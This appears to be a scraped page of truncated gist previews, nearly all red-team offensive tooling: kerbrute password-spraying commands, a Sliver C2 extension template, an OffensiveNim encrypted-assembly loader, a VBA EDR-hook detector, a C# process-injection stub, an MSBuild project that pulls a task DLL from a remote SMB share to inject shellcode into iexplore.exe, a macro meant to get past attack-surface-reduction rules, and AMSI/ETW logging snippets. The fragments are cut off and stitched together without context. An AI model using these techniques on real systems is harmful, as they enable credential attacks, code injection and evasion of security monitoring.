With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
{ | |
"SliverExtension" :{ | |
"prefix": "sliverext", | |
"body": [ "{", | |
"\"name\": \"$1\",", | |
"\"version\": \"0.0.0\",", | |
"\"command_name\": \"$2\",", | |
"\"extension_author\": \"$3\",", | |
"\"original_author\": \"$3\",", | |
"\"repo_url\": \"N/A\",", |
import nimcrypto | |
import winim/clr except `[]` # https://s3cur3th1ssh1t.github.io/Playing-with-OffensiveNim/ <-- thank you so much, 2 hours googling I almost went crazy | |
#[ | |
All credit goes to @byt3bl33d3r (OffensiveNim) and @s3cur3th1ssh1t | |
nimble install winim nimcrypto zippy | |
nim c -d:danger -d:strip --opt:size rsrcDecryptAssembly.nim | |
slurp = "staticRead" will read the file and store it in the variable (.rdata) on compile time. |
Private Declare PtrSafe Function GetModuleHandleA Lib "KERNEL32" (ByVal lpModuleName As String) As LongPtr | |
Private Declare PtrSafe Function GetProcAddress Lib "KERNEL32" (ByVal hModule As LongPtr, ByVal lpProcName As String) As LongPtr | |
Private Declare PtrSafe Sub CopyMemory Lib "KERNEL32" Alias "RtlMoveMemory" (ByVal Destination As LongPtr, ByVal Source As LongPtr, ByVal Length As Long) | |
'VBA Macro that detects hooks made by EDRs | |
'PoC By Juan Manuel Fernandez (@TheXC3LL) based on a post from SpecterOps (https://posts.specterops.io/adventures-in-dynamic-evasion-1fe0bac57aa) | |
Public Function checkHook(ByVal target As String, hModule As LongPtr) As Integer | |
Dim address As LongPtr |
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Runtime.InteropServices; | |
namespace InjectionTest | |
{ | |
public class DELEGATES | |
{ |
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode='<base64 encoded x64 shellcode>' | |
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
</Target> | |
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
</Project> | |
/* | |
================================ Compile as a .Net DLL ============================== | |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library /out:TestAssembly.dll TestAssembly.cs | |
*/ | |
using System.Windows.Forms; | |
namespace TestNamespace |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
' ASR rules bypass creating child processes | |
' https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-exploit-guard/enable-attack-surface-reduction | |
' https://www.darkoperator.com/blog/2017/11/11/windows-defender-exploit-guard-asr-rules-for-office | |
' https://www.darkoperator.com/blog/2017/11/6/windows-defender-exploit-guard-asr-vbscriptjs-rule | |
Sub ASR_blocked() | |
Dim WSHShell As Object | |
Set WSHShell = CreateObject("Wscript.Shell") | |
WSHShell.Run "cmd.exe" | |
End Sub |
[ | |
{ | |
"ProviderGUID": "72d164bf-fd64-4b2b-87a0-62dbcec9ae2a", | |
"ProviderName": "AccEventTool", | |
"ProviderGroupGUID": "4f50731a-89cf-4782-b3e0-dce8c90476ba", | |
"AssociatedFilenames": [ | |
"accevent.exe", | |
"inspect.exe", | |
"narrator.exe", | |
"srh.dll" |
$AutoLoggerName = 'MyAMSILogger' | |
$AutoLoggerGuid = "{$((New-Guid).Guid)}" | |
New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled | |
Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword ([UInt64] (0x8000000000000001 -band ([UInt64]::MaxValue))) -Property 0x41 |